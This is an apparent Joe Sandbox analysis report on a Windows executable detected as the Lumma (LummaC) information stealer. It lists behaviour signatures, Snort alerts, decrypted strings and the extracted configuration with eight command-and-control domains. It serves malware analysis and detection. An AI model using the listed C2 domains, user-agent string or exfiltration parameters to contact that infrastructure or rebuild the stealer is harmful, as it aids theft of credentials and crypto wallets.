Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6RVmzn1DzL.exe

Overview

General Information

Sample name:6RVmzn1DzL.exe
renamed because original name is a hash value
Original sample name:4d73427dc0b9f3dc4b846ace0ddc2deb.exe
Analysis ID:1465909
MD5:4d73427dc0b9f3dc4b846ace0ddc2deb
SHA1:43b8ffa09826c21676d759c0f3dc2088c4df4efe
SHA256:0d7b87b394b0620f352a3dd9391b202ff85c2659a007b74caf11799fc51e1e09
Tags:32exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6RVmzn1DzL.exe (PID: 3276 cmdline: "C:\Users\user\Desktop\6RVmzn1DzL.exe" MD5: 4D73427DC0B9F3DC4B846ACE0DDC2DEB)
    • WerFault.exe (PID: 6608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop"], "Build id": "S1ZrlH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2173115481.000000000129B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2172101207.000000000129B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2172144861.000000000129B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 29 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:07/02/24-08:32:58.581071
              SID:2054181
              Source Port:49712
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:52.825231
              SID:2054181
              Source Port:49708
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:33:01.124383
              SID:2054181
              Source Port:49719
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:33:03.978479
              SID:2054181
              Source Port:49724
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:51.867332
              SID:2054180
              Source Port:62670
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:55.875122
              SID:2054181
              Source Port:49710
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:54.529233
              SID:2054181
              Source Port:49709
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:51.904360
              SID:2054181
              Source Port:49707
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:56.961593
              SID:2054181
              Source Port:49711
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/02/24-08:32:59.582392
              SID:2054181
              Source Port:49714
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://contintnetksows.shop/Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/p1Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apien0Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apirofiAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apinAvira URL Cloud: Label: malware
              Source: towerxxuytwi.xyzAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apizAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apihAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop:443/apiKAvira URL Cloud: Label: malware
              Source: contintnetksows.shopAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/a7Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apiasswAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/ppAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apieppgdAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop:443/api_storageCJAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apiTAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop:443/api)Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/%%Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop:443/apiAvira URL Cloud: Label: malware
              Source: penetratedpoopp.xyzAvira URL Cloud: Label: malware
              Source: ellaboratepwsz.xyzAvira URL Cloud: Label: malware
              Source: swellfrrgwwos.xyzAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/apiAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/eAvira URL Cloud: Label: malware
              Source: foodypannyjsud.shopAvira URL Cloud: Label: malware
              Source: pedestriankodwu.xyzAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/aAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/s8Avira URL Cloud: Label: malware
              Source: potterryisiw.shopAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/api$Avira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/sAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/pAvira URL Cloud: Label: malware
              Source: https://contintnetksows.shop/api%Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 6RVmzn1DzL.exe.3276.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop"], "Build id": "S1ZrlH--"}
              Multi AV Scanner detection for submitted file
              Source: 6RVmzn1DzL.exeReversingLabs: Detection: 18%
              Source: 6RVmzn1DzL.exeVirustotal: Detection: 18%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.7% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: pedestriankodwu.xyz
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: towerxxuytwi.xyz
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: ellaboratepwsz.xyz
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: penetratedpoopp.xyz
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: swellfrrgwwos.xyz
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: contintnetksows.shop
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: foodypannyjsud.shop
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: potterryisiw.shop
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: contintnetksows.shop
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmpString decryptor: S1ZrlH--
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031E6FD2 CryptUnprotectData,0_2_031E6FD2
              Source: 6RVmzn1DzL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: 6RVmzn1DzL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: folder2iso.pdb source: 6RVmzn1DzL.exe
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006410FF FindFirstFileW,0_2_006410FF
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi]0_2_02DC92B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_02DB13F3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esi+000001D0h], 64425032h0_2_02DB935C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp eax, 03h0_2_02D95343
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_02DA1369
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then add edx, 03h0_2_02DB533B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_02DB1320
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [00442490h]0_2_02DA40F1
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_02DA617D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_02D9B163
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_02D9A693
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DA861B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [edx+eax], 00000000h0_2_02DA3618
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02DB65A3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [ecx], ax0_2_02DA87D3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esp+38h], 00000000h0_2_02DA4720
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esi+10h], ebx0_2_02DB74D3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edi], al0_2_02DB74D3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h0_2_02DB24D6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DA84CF
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02DB65A3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp eax0_2_02DB454F
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h0_2_02DA7523
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]0_2_02DAFAF3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+68h]0_2_02DA9A91
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edi, ecx0_2_02DA9A91
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_02DA7A55
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp esi0_2_02DCBB8D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_02DA7B53
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_02DCCB13
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_02DC7895
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp+000000B0h]0_2_02DB388B
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02DC28B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_02DB6853
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi+0Ch]0_2_02DB1816
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edi, dword ptr [esi]0_2_02DC99F8
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then push 00000400h0_2_02DC59B2
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [00442490h]0_2_02DA49A4
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_02DCC953
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02DA293D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_02DA293D
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edx, dword ptr [esp]0_2_02D9AEC3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then dec ebx0_2_02DCAEB9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+5Ch]0_2_02DA7E65
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_02D94FF3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_02DA2F03
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_02DA5CF2
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi]0_2_02DC8DD8
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0320B1A0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_031E61E0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [03212490h]0_2_031E3031
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edi, dword ptr [esi]0_2_03208085
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_031E60E2
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+5Ch]0_2_031E64F3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_031DF9F6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_03205F22
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0320AFE0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_031E0FCA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_031E0FCA
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [ecx], ax0_2_031E6E60
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_031E6CA8
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_031E437F
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp esi0_2_0320A21A
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+68h]0_2_031E811E
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edi, ecx0_2_031E811E
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]0_2_031EE180
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then push 00000400h0_2_0320403F
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [03212490h]0_2_031E277E
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_031D97F0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_031D3680
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov edx, dword ptr [esp]0_2_031D9550
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then dec ebx0_2_03209546
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_031E1590
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi]0_2_03207465
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_031F6449
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_031F6446
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov word ptr [eax], cx0_2_031E6B5C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h0_2_031F0B63
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esi+10h], ebx0_2_031F5B60
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov byte ptr [edi], al0_2_031F5B60
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h0_2_031E5BB0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp eax0_2_031F2BDC
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_031EFA80
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi]0_2_03207940
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp ecx0_2_031EF9AD
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp eax, 03h0_2_031D39D0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then add edx, 03h0_2_031F39C8
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esi+000001D0h], 64425032h0_2_031F79E9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_031E480A
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esp+000000B0h]0_2_031F1F18
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_03200F40
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then jmp dword ptr [03210C08h]0_2_031D1EA1
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov eax, dword ptr [esi+0Ch]0_2_031EFEA3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_031F4EE0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_031D8D20
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov dword ptr [esp+38h], 00000000h0_2_031E2DAD
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_031F4C30
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_031F4C30
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 4x nop then cmp byte ptr [edx+eax], 00000000h0_2_031E1CA5

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2054180 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (contintnetksows .shop) 192.168.2.5:62670 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49707 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49708 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49709 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49710 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49711 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49712 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49714 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49719 -> 172.67.141.234:443
              Source: TrafficSnort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49724 -> 172.67.141.234:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: pedestriankodwu.xyz
              Source: Malware configuration extractorURLs: towerxxuytwi.xyz
              Source: Malware configuration extractorURLs: ellaboratepwsz.xyz
              Source: Malware configuration extractorURLs: penetratedpoopp.xyz
              Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
              Source: Malware configuration extractorURLs: contintnetksows.shop
              Source: Malware configuration extractorURLs: foodypannyjsud.shop
              Source: Malware configuration extractorURLs: potterryisiw.shop
              Source: Malware configuration extractorURLs: pedestriankodwu.xyz
              Source: Malware configuration extractorURLs: towerxxuytwi.xyz
              Source: Malware configuration extractorURLs: ellaboratepwsz.xyz
              Source: Malware configuration extractorURLs: penetratedpoopp.xyz
              Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
              Source: Malware configuration extractorURLs: contintnetksows.shop
              Source: Malware configuration extractorURLs: foodypannyjsud.shop
              Source: Malware configuration extractorURLs: potterryisiw.shop
              Source: Malware configuration extractorURLs: pedestriankodwu.xyz
              Source: Malware configuration extractorURLs: towerxxuytwi.xyz
              Source: Malware configuration extractorURLs: ellaboratepwsz.xyz
              Source: Malware configuration extractorURLs: penetratedpoopp.xyz
              Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
              Source: Malware configuration extractorURLs: contintnetksows.shop
              Source: Malware configuration extractorURLs: foodypannyjsud.shop
              Source: Malware configuration extractorURLs: potterryisiw.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
